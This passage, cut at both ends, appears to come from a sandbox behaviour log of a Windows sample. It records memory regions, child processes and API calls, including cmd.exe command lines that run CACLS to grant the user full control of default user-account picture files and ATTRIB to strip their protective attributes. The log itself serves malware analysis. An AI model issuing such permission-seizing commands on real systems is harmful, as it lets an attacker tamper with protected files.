27182 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 27183 start_va = 0xd0000 end_va = 0xd8fff entry_point = 0xd0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27184 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27185 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27186 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27187 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27188 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27189 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27190 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27191 start_va = 0xe0000 end_va = 0x146fff entry_point = 0xe0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27192 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 27193 start_va = 0x220000 end_va = 
0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 27194 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27195 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27196 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27197 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27198 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27199 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27200 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 567 os_tid = 0x4f4 Thread: id = 568 os_tid = 0xed8 Process: id = "399" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ca0" os_pid = "0xf4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "397" os_parent_pid = "0x908" cmd_line = "ATTRIB 
-R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27201 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27202 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27203 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27204 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 27205 start_va = 0xd20000 end_va = 0xd26fff entry_point = 0xd20000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27206 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27207 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27208 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" 
filename = "" Region: id = 27209 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27210 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27211 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27212 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27213 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27214 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 27215 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 27216 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27217 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27218 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27219 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" 
(normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27220 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27221 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27222 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27223 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27224 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27225 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27226 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27227 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27228 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 27229 start_va = 
0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27230 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 569 os_tid = 0x8b4 Process: id = "400" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ca0" os_pid = "0xec8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27231 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27232 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27233 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27234 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private 
name = "private_0x0000000000170000" filename = "" Region: id = 27235 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27236 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27237 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27238 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27239 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 27240 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27241 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27242 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27243 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27244 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 27245 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000590000" filename = "" Region: id = 27246 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27247 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27248 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27249 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27250 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27251 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27252 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27253 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27254 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007f6f0000" filename = "" Region: id = 27255 start_va = 0x3c0000 end_va = 0x487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 27256 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27257 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27258 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 27259 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 27260 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 27261 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27262 start_va = 0x5a0000 end_va = 0x6a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 27263 start_va = 0x6b0000 end_va = 0x12affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 27264 start_va = 0x12b0000 end_va = 0x1412fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012b0000" filename = "" Region: id = 27265 start_va = 0x1420000 end_va = 0x16eefff entry_point = 0x1420000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 
570 os_tid = 0xff0 [0187.937] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f884 | out: lpSystemTimeAsFileTime=0x26f884*(dwLowDateTime=0xa4ebc300, dwHighDateTime=0x1d440a9)) [0187.937] GetCurrentProcessId () returned 0xec8 [0187.937] GetCurrentThreadId () returned 0xff0 [0187.937] GetTickCount () returned 0x35a11 [0187.937] QueryPerformanceCounter (in: lpPerformanceCount=0x26f87c | out: lpPerformanceCount=0x26f87c*=24472599613) returned 1 [0187.937] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0187.937] __set_app_type (_Type=0x1) [0187.937] __p__fmode () returned 0x76b331f4 [0187.937] __p__commode () returned 0x76b331fc [0187.938] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0187.938] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0187.938] GetCurrentThreadId () returned 0xff0 [0187.938] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xff0) returned 0x38 [0187.938] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.938] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0187.938] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.938] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0187.938] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f814 | out: phkResult=0x26f814*=0x0) returned 0x2 [0187.938] VirtualQuery (in: lpAddress=0x26f84b, lpBuffer=0x26f7e4, dwLength=0x1c | out: lpBuffer=0x26f7e4*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.938] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f7e4, dwLength=0x1c | out: 
lpBuffer=0x26f7e4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0187.938] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f7e4, dwLength=0x1c | out: lpBuffer=0x26f7e4*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0187.938] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f7e4, dwLength=0x1c | out: lpBuffer=0x26f7e4*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.938] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f7e4, dwLength=0x1c | out: lpBuffer=0x26f7e4*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0187.938] GetConsoleOutputCP () returned 0x1b5 [0187.938] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.939] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0187.939] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.939] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0187.939] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.939] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0187.939] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.939] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.939] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.939] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0187.939] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.939] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0187.939] GetEnvironmentStringsW () returned 0x2d0308* [0187.940] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0187.940] GetEnvironmentStringsW 
() returned 0x2d0308* [0187.940] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0187.940] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e784 | out: phkResult=0x26e784*=0x40) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x0, lpData=0x26e790*=0xb8, lpcbData=0x26e788*=0x1000) returned 0x2 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x1, lpcbData=0x26e788*=0x4) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x0, lpData=0x26e790*=0x1, lpcbData=0x26e788*=0x1000) returned 0x2 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x0, lpcbData=0x26e788*=0x4) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x40, lpcbData=0x26e788*=0x4) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x40, lpcbData=0x26e788*=0x4) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x0, lpData=0x26e790*=0x40, lpcbData=0x26e788*=0x1000) returned 0x2 [0187.940] RegCloseKey (hKey=0x40) 
returned 0x0 [0187.940] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e784 | out: phkResult=0x26e784*=0x40) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x0, lpData=0x26e790*=0x40, lpcbData=0x26e788*=0x1000) returned 0x2 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x1, lpcbData=0x26e788*=0x4) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x0, lpData=0x26e790*=0x1, lpcbData=0x26e788*=0x1000) returned 0x2 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x0, lpcbData=0x26e788*=0x4) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x9, lpcbData=0x26e788*=0x4) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x9, lpcbData=0x26e788*=0x4) returned 0x0 [0187.941] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x0, lpData=0x26e790*=0x9, lpcbData=0x26e788*=0x1000) returned 0x2 [0187.941] RegCloseKey (hKey=0x40) returned 0x0 [0187.941] time (in: timer=0x0 | out: timer=0x0) returned 
0x5b886396 [0187.941] srand (_Seed=0x5b886396) [0187.941] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"" [0187.941] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"" [0187.941] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.941] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2d1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0187.941] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.941] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.942] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.942] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0187.942] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0187.942] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0187.942] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0187.942] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0187.942] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0187.942] _wcsicmp 
